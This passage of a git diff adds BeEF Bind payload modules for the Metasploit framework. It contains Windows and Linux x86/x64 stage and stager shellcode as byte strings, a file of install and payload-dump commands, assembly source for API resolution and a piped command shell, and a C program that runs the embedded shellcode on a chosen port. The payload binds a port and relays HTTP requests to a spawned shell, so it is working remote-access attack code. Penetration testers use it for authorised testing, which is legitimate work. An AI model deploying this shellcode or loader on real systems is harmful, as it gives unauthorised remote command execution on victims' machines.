+					'Convention' => 'beef_bind'
+				},
+			'Stage'         =>
+				{
+					'Offsets' =>
+						{
+							'LPORT' => [ 511, 'n' ]
+						},
+					'Payload' =>
+						"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" +
+						"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" +
+						"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" +
+						"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" +
+						"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" +
+						"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" +
+						"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
+						"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
+						"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" +
+						"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" +
+
+						"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" +
+						"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" +
+						"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" +
+						"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
+						"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" +
+						"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" +
+						"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" +
+						"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" +
+						"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" +
+						"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" +
+
+						"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" +
+						"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" +
+						"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" +
+						"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" +
+						"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" +
+						"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" +
+						"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" +
+						"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" +
+						"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" +
+						"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
+
+						"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" +
+						"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
+						"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" +
+						"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" +
+						"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" +
+						"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" +
+						"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" +
+						"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" +
+						"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" +
+						"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" +
+
+						"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" +
+						"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" +
+						"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
+						"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" +
+						"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" +
+						"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" +
+						"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" +
+						"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" +
+						"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" +
+						"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" +
+
+						"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" +
+						"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" +
+						"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" +
+						"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" +
+						"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" +
+						"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" +
+						"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" +
+						"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" +
+						"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
+						"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" +
+
+						"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" +
+						"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" +
+						"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" +
+						"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" +
+						"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" +
+						"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" +
+						"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" +
+						"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" +
+						"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" +
+						"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" +
+
+						"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" +
+						"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" +
+						"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" +
+						"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" +
+						"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" +
+						"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" +
+						"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" +
+						"\xff\xd5\xe9\x58\xfe\xff\xff"
+				}
+			))
+	end
+
+	# Stage encoding is safe for this payload
+	def encode_stage?
+		true
+	end
+end
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb
new file mode 100644
index 000000000..4ef9a5b10
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x64.rb
@@ -0,0 +1,49 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/beef_bind'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Linux
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind HTTP Stager',
+			'Description'   => 'Proxy web requests between a web browser and a shell',
+			'Author'        => ['Bart Leppens'],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X64,
+			'Handler'       => Msf::Handler::BeEFBind,
+			'Convention'    => 'beef_bind',
+			'Stager'        =>
+				{
+					'RequiresMidstager' => false,
+					'Offsets' => { 'LPORT' => [ 54, 'n' ] },
+					'Payload' =>
+						"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" +
+						"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" +
+						"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" +
+						"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" +
+						"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" +
+						"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" +
+						"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" +
+						"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" +
+						"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" +
+						"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" +
+						"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" +
+						"\x01\xc6\xff\xe6"
+				}
+			))
+	end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb
new file mode 100644
index 000000000..7174e7498
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-linux-x86.rb
@@ -0,0 +1,47 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/beef_bind'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Linux
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind HTTP Stager',
+			'Description'   => 'Proxy web requests between a web browser and a shell',
+			'Author'        => ['Bart Leppens'],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'linux',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BeEFBind,
+			'Convention'    => 'beef_bind',
+			'Stager'        =>
+				{
+					'RequiresMidstager' => false,
+					'Offsets' => { 'LPORT' => [ 47, 'n' ] },
+					'Payload' =>
+						"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" +
+						"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" +
+						"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" +
+						"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" +
+						"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" +
+						"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" +
+						"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" +
+						"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" +
+						"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" +
+						"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
+				}
+			))
+	end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb
new file mode 100644
index 000000000..a8ae2da82
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/beef_bind-stager-windows-x86.rb
@@ -0,0 +1,62 @@
+##
+# $Id: beef_bind-stager.rb 121018 Ty Miller @ Threat Intelligence$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+require 'msf/core/handler/beef_bind'
+
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Windows
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'BeEF Bind HTTP Stager',
+			'Version'       => '$Revision: 9179 $',
+			'Description'   => 'Proxy web requests between a web browser and a shell',
+			'Author'        => ['Ty Miller'],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'win',
+			'Arch'          => ARCH_X86,
+			'Handler'       => Msf::Handler::BeEFBind,
+			'Convention'    => 'beef_bind',
+			'Stager'        =>
+				{
+					'RequiresMidstager' => false,
+					'Offsets' => { 'LPORT' => [ 200, 'n' ] },
+					'Payload' =>
+						# Length: 299 bytes
+						"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
+						"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
+						"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
+						"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
+						"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
+						"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
+						"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
+						"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
+						"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
+						"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
+						"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
+						"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
+						"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
+						"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
+						"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" +
+						"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" +
+						"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" +
+						"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" +
+						"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
+				}
+			))
+	end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt
new file mode 100644
index 000000000..d1c0fc2ff
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/msf/instructions.txt
@@ -0,0 +1,37 @@
+
+Install into Metasploit on BackTrack:
+
+cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb 
+cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb 
+cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb 
+cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb
+cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb
+cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb
+cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb
+
+Check it works:
+
+msfpayload -l | grep beef_bind
+
+
+Get info on the payload:
+
+msfpayload windows/beef_shell/beef_bind S
+
+
+Dump stager and stage in C format:
+
+msfpayload windows/beef_shell/beef_bind C
+
+
+Dump stager in raw format:
+
+msfpayload windows/beef_shell/beef_bind R > beef_bind-stager
+
+
+Encode stager to remove nulls:
+
+msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'
+
+
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm
new file mode 100644
index 000000000..43325cf76
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stage.asm
@@ -0,0 +1,12 @@
+
+[SECTION .text]
+BITS 32
+[ORG 0]					;code starts at offset 0 
+
+	cld				;clear the direction flag
+	call start			;jump over block_api and push its address onto the stack
+%include "src/block_api.asm"
+start:
+	pop ebp				;pop the address of block_api into ebp for calling functions later
+%include "src/block_beef_bind-stage.asm"	;setup web listener to proxy requests and responses to the shell
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm
new file mode 100644
index 000000000..5dc580486
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/beef_bind_tcp-stager.asm
@@ -0,0 +1,12 @@
+
+[SECTION .text]
+BITS 32
+[ORG 0]					;code starts at offset 0 
+
+	cld				;clear the direction flag
+	call start			;jump over block_api and push its address onto the stack
+%include "src/block_api.asm"
+start:
+	pop ebp				;pop the address of block_api into ebp for calling functions later
+%include "src/block_beef_bind-stager.asm"	;setup bind port, receive web request, locate stage, execute it
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c
new file mode 100644
index 000000000..a939bd498
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/socket.c
@@ -0,0 +1,36 @@
+/**
+ Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+ Browser Exploitation Framework (BeEF) - http://beefproject.com
+ See the file 'doc/COPYING' for copying permission
+
+A standalone version can be compiled with MinGW:
+c:\MinGW\bin>gcc -o beefstager.exe beefstager.c
+
+and then executed with:
+c:\MinGW\bin>beefstager.exe 1234
+
+or just with the default port 4444:
+c:\MinGW\bin>beefstager.exe
+**/
+
+
+#include <stdlib.h>
+
+char code[] = "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5\xBB\x00\x10\x00\x00\x6A\x40\x53\x53\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x89\xC6\x6A\x00\x53\x50\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x57\x68\xC6\x96\x87\x52\xFF\xD5\x81\x3E\x63\x6D\x64\x3D\x74\x03\x46\xEB\xF5\x83\xC6\x04\xFF\xE6";
+
+int main(int argc, char **argv)
+{
+if (argc == 2){
+  int port;
+  port = atoi(argv[1]);
+  if (port <= 0xFFFF){
+    code[200] = ((port & 0xFF00) >> 8) & 0xFF;
+    code[201] = ((port & 0xFF));
+  }	
+}
+
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+ return 0;
+}
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm
new file mode 100644
index 000000000..2acc13dde
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_api.asm
@@ -0,0 +1,97 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+; Size: 137 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+
+; Input: The hash of the API to call and all its parameters must be pushed onto stack.
+; Output: The return value from the API call will be in EAX.
+; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
+; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
+; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
+; Note: This function is unable to call forwarded exports.
+
+api_call:
+  pushad                 ; We preserve all the registers for the caller, bar EAX and ECX.
+  mov ebp, esp           ; Create a new stack frame
+  xor edx, edx           ; Zero EDX
+  mov edx, [fs:edx+48]   ; Get a pointer to the PEB
+  mov edx, [edx+12]      ; Get PEB->Ldr
+  mov edx, [edx+20]      ; Get the first module from the InMemoryOrder module list
+next_mod:                ;
+  mov esi, [edx+40]      ; Get pointer to modules name (unicode string)
+  movzx ecx, word [edx+38] ; Set ECX to the length we want to check 
+  xor edi, edi           ; Clear EDI which will store the hash of the module name
+loop_modname:            ;
+  xor eax, eax           ; Clear EAX
+  lodsb                  ; Read in the next byte of the name
+  cmp al, 'a'            ; Some versions of Windows use lower case module names
+  jl not_lowercase       ;
+  sub al, 0x20           ; If so normalise to uppercase
+not_lowercase:           ;
+  ror edi, 13            ; Rotate right our hash value
+  add edi, eax           ; Add the next byte of the name
+  loop loop_modname      ; Loop untill we have read enough
+  ; We now have the module hash computed
+  push edx               ; Save the current position in the module list for later
+  push edi               ; Save the current module hash for later
+  ; Proceed to itterate the export address table, 
+  mov edx, [edx+16]      ; Get this modules base address
+  mov eax, [edx+60]      ; Get PE header
+  add eax, edx           ; Add the modules base address
+  mov eax, [eax+120]     ; Get export tables RVA
+  test eax, eax          ; Test if no export address table is present
+  jz get_next_mod1       ; If no EAT present, process the next module
+  add eax, edx           ; Add the modules base address
+  push eax               ; Save the current modules EAT
+  mov ecx, [eax+24]      ; Get the number of function names  
+  mov ebx, [eax+32]      ; Get the rva of the function names
+  add ebx, edx           ; Add the modules base address
+  ; Computing the module hash + function hash
+get_next_func:           ;
+  jecxz get_next_mod     ; When we reach the start of the EAT (we search backwards), process the next module
+  dec ecx                ; Decrement the function name counter
+  mov esi, [ebx+ecx*4]   ; Get rva of next module name
+  add esi, edx           ; Add the modules base address
+  xor edi, edi           ; Clear EDI which will store the hash of the function name
+  ; And compare it to the one we want
+loop_funcname:           ;
+  xor eax, eax           ; Clear EAX
+  lodsb                  ; Read in the next byte of the ASCII function name
+  ror edi, 13            ; Rotate right our hash value
+  add edi, eax           ; Add the next byte of the name
+  cmp al, ah             ; Compare AL (the next byte from the name) to AH (null)
+  jne loop_funcname      ; If we have not reached the null terminator, continue
+  add edi, [ebp-8]       ; Add the current module hash to the function hash
+  cmp edi, [ebp+36]      ; Compare the hash to the one we are searchnig for 
+  jnz get_next_func      ; Go compute the next function hash if we have not found it
+  ; If found, fix up stack, call the function and then value else compute the next one...
+  pop eax                ; Restore the current modules EAT
+  mov ebx, [eax+36]      ; Get the ordinal table rva      
+  add ebx, edx           ; Add the modules base address
+  mov cx, [ebx+2*ecx]    ; Get the desired functions ordinal
+  mov ebx, [eax+28]      ; Get the function addresses table rva  
+  add ebx, edx           ; Add the modules base address
+  mov eax, [ebx+4*ecx]   ; Get the desired functions RVA
+  add eax, edx           ; Add the modules base address to get the functions actual VA
+  ; We now fix up the stack and perform the call to the desired function...
+finish:
+  mov [esp+36], eax      ; Overwrite the old EAX value with the desired api address for the upcoming popad
+  pop ebx                ; Clear off the current modules hash
+  pop ebx                ; Clear off the current position in the module list
+  popad                  ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
+  pop ecx                ; Pop off the origional return address our caller will have pushed
+  pop edx                ; Pop off the hash value our caller will have pushed
+  push ecx               ; Push back the correct return value
+  jmp eax                ; Jump into the required function
+  ; We now automagically return to the correct caller...
+get_next_mod:            ;
+  pop eax                ; Pop off the current (now the previous) modules EAT
+get_next_mod1:           ;
+  pop edi                ; Pop off the current (now the previous) modules hash
+  pop edx                ; Restore our position in the module list
+  mov edx, [edx]         ; Get the next module
+  jmp short next_mod     ; Process this module
\ No newline at end of file
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm
new file mode 100644
index 000000000..c88ab6e23
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stage.asm
@@ -0,0 +1,177 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+;INPUT: EBP is block_api.
+
+%include "src/block_virtualalloc.asm"
+			 ; Input: None
+			 ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
+			 ; Clobbers: EAX, EBX, ECX, EDX
+
+  mov esi, eax		 ; point esi to start of buffer, used as pseudo-frame pointer
+
+%include "src/block_pipes.asm"
+			 ; Create pipes to redirect stage stdin, stdout, stderr
+			 ; Input: EBP is api_call
+			 ; Output:
+			 ;       esp+00  child stdin  read  file descriptor (inherited)
+			 ;       esp+04  child stdin  write file descriptor (not inherited)
+			 ;       esp+08  child stdout read  file descriptor (not inherited)
+			 ;       esp+12  child stdout write file descriptor (inherited)
+			 ;       esp+16  lpPipeAttributes structure (not used after block - 12 bytes)
+			 ; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
+
+  mov edi,esi		 ; save esi since it gets clobbered
+
+%include "src/block_shell_pipes.asm"
+			 ; Create process with redirected stdin, stdout, stderr to our pipes
+			 ; Input:
+			 ;       EBP is api_call
+			 ;       esp+00  child stdin  read  file descriptor (inherited)
+			 ;       esp+04  not used
+			 ;       esp+08  not used
+			 ;       esp+12  child stdout write file descriptor (inherited)
+			 ; Output: None.
+			 ; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified
+
+  mov esi,edi		 ; restore esi
+
+ReadLoop:		 ; Read output from the child process
+
+clear_buffer:
+  mov ecx,0xFF8		 ; zero output buffer starting at esi+8 with 0xFF8 nulls
+  lea eax,[esi+8]	 ; point eax to start of command/output buffer
+zero_buffer:            
+  mov byte [eax],0	 ; push a null dword
+  inc eax		 ; point to the next byte in the buffer
+  loop zero_buffer	 ; keep looping untill we have zeroed the buffer
+
+
+response_headers:
+  push esi		 ; save pointer to start of buffer
+  lea edi,[esi+1048]	 ; set pointer to output buffer
+  call get_headers       ; locate the static http response headers
+  db 'HTTP/1.1 200 OK', 0x0d, 0x0a, 'Content-Type: text/html', 0x0d, 0x0a, 'Access-Control-Allow-Origin: *', 0x0d, 0x0a, 'Content-Length: 3016', 0x0d, 0x0a, 0x0d, 0x0a
+get_headers:
+  pop esi		 ; get pointer to response headers into esi
+  mov ecx, 98            ; length of http response headers
+  rep movsb              ; move the http headers into the buffer
+  pop esi		 ; restore pointer to start of buffer
+
+
+bind_port:
+  push esi		 ; save buffer pointer onto stack
+%include "src/block_bind_tcp.asm"       ;by here we will have performed the bind_tcp connection to setup our external web socket
+			 ; Input: EBP must be the address of 'api_call'.
+			 ; Output: EDI will be the newly connected clients socket
+			 ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+  add esp, 0x1A0	 ; restore stack pointer
